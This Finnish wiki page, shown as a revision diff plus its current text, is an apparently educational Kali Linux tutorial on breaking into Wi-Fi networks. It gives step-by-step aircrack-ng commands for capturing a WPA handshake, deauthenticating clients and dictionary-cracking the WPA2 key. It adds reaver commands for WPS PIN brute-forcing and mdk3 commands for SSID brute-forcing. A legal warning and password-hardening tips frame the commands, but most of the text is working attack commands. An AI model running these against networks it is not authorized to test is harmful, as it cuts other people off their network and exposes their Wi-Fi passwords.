Mainos / Advertisement:

Ero sivun ”Kali Linux” versioiden välillä

Kohteesta Taisto
Siirry navigaatioon Siirry hakuun
 
(17 välissä olevaa versiota 3 käyttäjän tekeminä ei näytetä)
Rivi 1: Rivi 1:
 +
<languages/>
 +
<translate>
 +
<!--T:1-->
 
Kali Linux on Debianiin perustuva paketti, joka on tarkoitettu rikosteknisen tutkimiseen ja läpäisytesteihin.  
 
Kali Linux on Debianiin perustuva paketti, joka on tarkoitettu rikosteknisen tutkimiseen ja läpäisytesteihin.  
  
 +
<!--T:2-->
 
Kali Linux sisältää esimerkiksi salasanan murto-ohjelman ja WLAN salauksen murtoon aircrack-ng.
 
Kali Linux sisältää esimerkiksi salasanan murto-ohjelman ja WLAN salauksen murtoon aircrack-ng.
  
Teksti: Wikipedia
+
<!--T:3-->
 +
Ohjeet ovat '''opetuskäyttöön'''.
  
== Asennus ==
+
== Asennus == <!--T:4-->
  
Lataa Kali Linux http://www.kali.org/downloads/, suosittelemme torrent latausta, sillä paljon nopeampi kuin Direct.
+
<!--T:5-->
 +
Lataa Kali Linux http://www.kali.org/downloads/, suosittelemme torrent -latausta, sillä paljon nopeampi kuin suoralataus.
  
Asentaminen on samanlaista kuin  [[Debian#Asennus|Debianin]] asennus
+
<!--T:6-->
 +
Asentaminen on samankaltainen [[Debian#Asennus|Debianin]] asennus
  
== Paketit ==
+
== Paketit == <!--T:7-->
  
 +
<!--T:8-->
 
Lista paketeista joita voit käyttää tietoturvan testauksessa. Ohjeiden ideoina on kuvastaa kuinka yksinkertaista on murtautua erilaisiin järjestelmiin ja se että pitää suojautua mahdollisimman hyvin.
 
Lista paketeista joita voit käyttää tietoturvan testauksessa. Ohjeiden ideoina on kuvastaa kuinka yksinkertaista on murtautua erilaisiin järjestelmiin ja se että pitää suojautua mahdollisimman hyvin.
  
 +
<!--T:9-->
 
<span style="color:red;"> HUOM! Omiin järjestelmiin murtautuminen sallittua. Luvattomat tietomurrot ovat Suomen laissa kiellettyjä! </span>
 
<span style="color:red;"> HUOM! Omiin järjestelmiin murtautuminen sallittua. Luvattomat tietomurrot ovat Suomen laissa kiellettyjä! </span>
  
=== aircrack-ng ===
+
<!--T:10-->
 +
[[File:Loic skiddie.jpg|Älä ole script kiddy]]
  
 +
=== aircrack-ng === <!--T:11-->
 +
 +
<!--T:12-->
 
Tämä paketti on WLAN verkkojen murtamiseen. Testasimme tätä omassa verkossamme, eli emme ole käyttäneet luvattomasti toisen verkkoa.
 
Tämä paketti on WLAN verkkojen murtamiseen. Testasimme tätä omassa verkossamme, eli emme ole käyttäneet luvattomasti toisen verkkoa.
  
 +
Tämän voi asentaa myös [[Aircrack-ng|Debianiin]].
  
 +
<!--T:13-->
 
1. Avataan root terminaali
 
1. Avataan root terminaali
  
 +
<!--T:14-->
 
2. Määritetään langaton verkkokortti
 
2. Määritetään langaton verkkokortti
  
   airmon-ng aloittaa wlan0
+
   <!--T:15-->
 +
airmon-ng start wlan0
  
 +
<!--T:16-->
 
3. Tämä komento listaa kaikki lähialueen WLAN-verkot
 
3. Tämä komento listaa kaikki lähialueen WLAN-verkot
  
   airodump-ng mon0
+
   <!--T:17-->
 +
airodump-ng mon0
  
 +
<!--T:18-->
 
4. Keskitytään nyt tietylle tukiasemalle ja odotetaan että muodostaa yhteyden tukiasemalle.
 
4. Keskitytään nyt tietylle tukiasemalle ja odotetaan että muodostaa yhteyden tukiasemalle.
  
   airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
+
   <!--T:19-->
 +
airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
  
 +
<!--T:20-->
 
* bssid = MAC osoite tukiasemasta
 
* bssid = MAC osoite tukiasemasta
 
* write WPAcrack = Hakemistoon jonne kirjoitetaan -> Eli kotikansiosi juureen
 
* write WPAcrack = Hakemistoon jonne kirjoitetaan -> Eli kotikansiosi juureen
  
 +
<!--T:21-->
 
5. Jätä nykyinen terminaali ikkuna taustalle ja avaa uusi terminaali ikkuna.  
 
5. Jätä nykyinen terminaali ikkuna taustalle ja avaa uusi terminaali ikkuna.  
  
   aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
+
Tällä komennolla tapetaan kaikkien WLAN tukiasemalla olevien WLAN istunto (eli heitetään ulos WIFI:stä)
 +
 
 +
   <!--T:22-->
 +
aireplay-ng --deauth 100 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
  
* --deauth 100 = Katkaise yhteys 100 kertaa
+
<!--T:23-->
 +
* --deauth 100 = Katkaise yhteys 100 kertaa. Syöttämällä 0 arvon tämä ajetaan kunnes pysäytät prosessin.
 
* –a 00:14:BF:E0:E8:D5 = BSSID tukiasemasta
 
* –a 00:14:BF:E0:E8:D5 = BSSID tukiasemasta
 
* –c 4C:EB:42:59:DE:31 = BSSID asiakaslaitteesta
 
* –c 4C:EB:42:59:DE:31 = BSSID asiakaslaitteesta
  
 +
<!--T:24-->
 
Jos virhe  
 
Jos virhe  
  
   Waiting for beacon frame (BSSID: 00:14:BF:E0:E8:D5) on channel -1
+
   <!--T:25-->
 +
Waiting for beacon frame (BSSID: 00:14:BF:E0:E8:D5) on channel -1
 
   Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
 
   Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
  
 +
<!--T:26-->
 
aja komento (sammuta palvelu)  
 
aja komento (sammuta palvelu)  
  
   /etc/init.d/network-manager stop
+
   <!--T:27-->
 +
/etc/init.d/network-manager stop
  
 +
<!--T:28-->
 
Pian tulostuu toiselle ikkunalle WPA handshake: 00:14:BF:E0:E8:D5
 
Pian tulostuu toiselle ikkunalle WPA handshake: 00:14:BF:E0:E8:D5
  
 +
<!--T:29-->
 
6. Aletaan siis se oikea murtaminen.
 
6. Aletaan siis se oikea murtaminen.
  
   aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [[source/*.cap]]
+
   <!--T:30-->
 +
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [source/*.cap]
  
 +
<!--T:31-->
 
Esimerkiksi:
 
Esimerkiksi:
  
   aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
+
   <!--T:32-->
 +
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
  
 +
<!--T:33-->
 
* WPAcrack-01.cap = Tiedosto jossa on hash salasanasta
 
* WPAcrack-01.cap = Tiedosto jossa on hash salasanasta
 
*  /usr/share/wordlist/* = polku salasana tiedostoon
 
*  /usr/share/wordlist/* = polku salasana tiedostoon
  
Sitten vain odotetaan että hash on purettu.
+
<!--T:34-->
 +
Sitten vain odotetaan että hash on purettu. Nopeutat testissä kirjoittamalla salasanan tiedostoon itse alkupäähän.
  
 +
<!--T:35-->
 
Tulostuu KEY FOUND: [salasanasi]
 
Tulostuu KEY FOUND: [salasanasi]
  
 +
==== WPS Murotyökalu ====
 +
 +
WPS eli WIFI Protected Setup on siis helppokäyttöinen WLAN autentikointiin mutta myös aika heikko suojaus. Tätä emme suosittele ja tässä ohjeistetaan miten sen PIN koodin voi murtaa ja palauttaa WPA salasann. Tämä liittyy WPS:n haavoitttuvuuteen...
 +
 +
  reaver -i mon0 -b BSSID -vv
 +
 +
Odota tuloksia...
 +
 +
 +
==== SSID selville ====
 +
 +
Kuvitellaampa tilanne, jossa saat jostain langattoman tukiaseman josta et tiedä mitään. Haluaisit kuitenkin yhdistaa siihen, mutta et tiedä ssid. Ja tukiasemassa ei ole ketään yhteydessäkään
 +
 +
mdk3 wlan0 b -t 00:19:07:C4:8A:60
 +
 +
Nyt se bruteforcettaa ja koittaa selvittää kyseisen MAC-osoitteen omaavan tukiaseman SSID randomisti. Fiksua olisi toki käyttää sanalistaa, näin:
 +
 +
mdk3 wlan0 b -f /usr/share/wordlists/fasttrack.txt -t 00:19:07:C4:8A:60
 +
 +
 +
==== Paranna WLAN verkkosi tietoturvaa ==== <!--T:36-->
  
==== Paranna WLAN verkkosi tietoturvaa ====
+
<!--T:37-->
 +
Salauksena ehdottomasti vähintään WPA2-PSK / WPA2-PERSONAL. Tämä kuitenkin on juuri ohjeemme mukaisesti murrettavissa.
  
 +
<!--T:38-->
 
* käyttämällä pitkää, yli 8 merkkistä salasanaa
 
* käyttämällä pitkää, yli 8 merkkistä salasanaa
 
* Isoja ja pieniä kirjaimia
 
* Isoja ja pieniä kirjaimia
Rivi 82: Rivi 144:
 
* ei ole mikään sana tai lause
 
* ei ole mikään sana tai lause
  
== Lähteet ==
+
== Lähteet == <!--T:39-->
  
 +
<!--T:40-->
 
http://www.kali.org/
 
http://www.kali.org/
  
 +
<!--T:41-->
 
http://fi.wikipedia.org/wiki/Kali_Linux
 
http://fi.wikipedia.org/wiki/Kali_Linux
  
 +
<!--T:42-->
 
http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/
 
http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/
  
 +
<!--T:43-->
 
http://sarajarvi.org/tutoriaalit-wpa-murto/
 
http://sarajarvi.org/tutoriaalit-wpa-murto/
 +
</translate>

Nykyinen versio 13. helmikuuta 2018 kello 08.43

Muut kielet:
English • ‎suomi

Kali Linux on Debianiin perustuva paketti, joka on tarkoitettu rikosteknisen tutkimiseen ja läpäisytesteihin.

Kali Linux sisältää esimerkiksi salasanan murto-ohjelman ja WLAN salauksen murtoon aircrack-ng.

Ohjeet ovat opetuskäyttöön.

Asennus

Lataa Kali Linux http://www.kali.org/downloads/, suosittelemme torrent -latausta, sillä paljon nopeampi kuin suoralataus.

Asentaminen on samankaltainen Debianin asennus

Paketit

Lista paketeista joita voit käyttää tietoturvan testauksessa. Ohjeiden ideoina on kuvastaa kuinka yksinkertaista on murtautua erilaisiin järjestelmiin ja se että pitää suojautua mahdollisimman hyvin.

HUOM! Omiin järjestelmiin murtautuminen sallittua. Luvattomat tietomurrot ovat Suomen laissa kiellettyjä!

Älä ole script kiddy

aircrack-ng

Tämä paketti on WLAN verkkojen murtamiseen. Testasimme tätä omassa verkossamme, eli emme ole käyttäneet luvattomasti toisen verkkoa.

Tämän voi asentaa myös Debianiin.

1. Avataan root terminaali

2. Määritetään langaton verkkokortti

 airmon-ng start wlan0

3. Tämä komento listaa kaikki lähialueen WLAN-verkot

 airodump-ng mon0

4. Keskitytään nyt tietylle tukiasemalle ja odotetaan että muodostaa yhteyden tukiasemalle.

 airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write /root/WPAcrack mon0
  • bssid = MAC osoite tukiasemasta
  • write WPAcrack = Hakemistoon jonne kirjoitetaan -> Eli kotikansiosi juureen

5. Jätä nykyinen terminaali ikkuna taustalle ja avaa uusi terminaali ikkuna.

Tällä komennolla tapetaan kaikkien WLAN tukiasemalla olevien WLAN istunto (eli heitetään ulos WIFI:stä)

 aireplay-ng --deauth 100 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0
  • --deauth 100 = Katkaise yhteys 100 kertaa. Syöttämällä 0 arvon tämä ajetaan kunnes pysäytät prosessin.
  • –a 00:14:BF:E0:E8:D5 = BSSID tukiasemasta
  • –c 4C:EB:42:59:DE:31 = BSSID asiakaslaitteesta

Jos virhe

 Waiting for beacon frame (BSSID: 00:14:BF:E0:E8:D5) on channel -1
 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

aja komento (sammuta palvelu)

 /etc/init.d/network-manager stop

Pian tulostuu toiselle ikkunalle WPA handshake: 00:14:BF:E0:E8:D5

6. Aletaan siis se oikea murtaminen.

 aircrack-ng -a2 -b [router bssid] -w [path to wordlist] [source/*.cap]

Esimerkiksi:

 aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /usr/share/wordlist/* /root/Desktop/WPAcrack.cap
  • WPAcrack-01.cap = Tiedosto jossa on hash salasanasta
  • /usr/share/wordlist/* = polku salasana tiedostoon

Sitten vain odotetaan että hash on purettu. Nopeutat testissä kirjoittamalla salasanan tiedostoon itse alkupäähän.

Tulostuu KEY FOUND: [salasanasi]

WPS Murotyökalu

WPS eli WIFI Protected Setup on siis helppokäyttöinen WLAN autentikointiin mutta myös aika heikko suojaus. Tätä emme suosittele ja tässä ohjeistetaan miten sen PIN koodin voi murtaa ja palauttaa WPA salasann. Tämä liittyy WPS:n haavoitttuvuuteen...

 reaver -i mon0 -b BSSID -vv

Odota tuloksia...


SSID selville

Kuvitellaampa tilanne, jossa saat jostain langattoman tukiaseman josta et tiedä mitään. Haluaisit kuitenkin yhdistaa siihen, mutta et tiedä ssid. Ja tukiasemassa ei ole ketään yhteydessäkään

mdk3 wlan0 b -t 00:19:07:C4:8A:60

Nyt se bruteforcettaa ja koittaa selvittää kyseisen MAC-osoitteen omaavan tukiaseman SSID randomisti. Fiksua olisi toki käyttää sanalistaa, näin:

mdk3 wlan0 b -f /usr/share/wordlists/fasttrack.txt -t 00:19:07:C4:8A:60


Paranna WLAN verkkosi tietoturvaa

Salauksena ehdottomasti vähintään WPA2-PSK / WPA2-PERSONAL. Tämä kuitenkin on juuri ohjeemme mukaisesti murrettavissa.

  • käyttämällä pitkää, yli 8 merkkistä salasanaa
  • Isoja ja pieniä kirjaimia
  • erikoismerkkejä
  • numeroita
  • ei ole mikään sana tai lause

Lähteet

http://www.kali.org/

http://fi.wikipedia.org/wiki/Kali_Linux

http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/

http://sarajarvi.org/tutoriaalit-wpa-murto/

Mainos / Advertisement: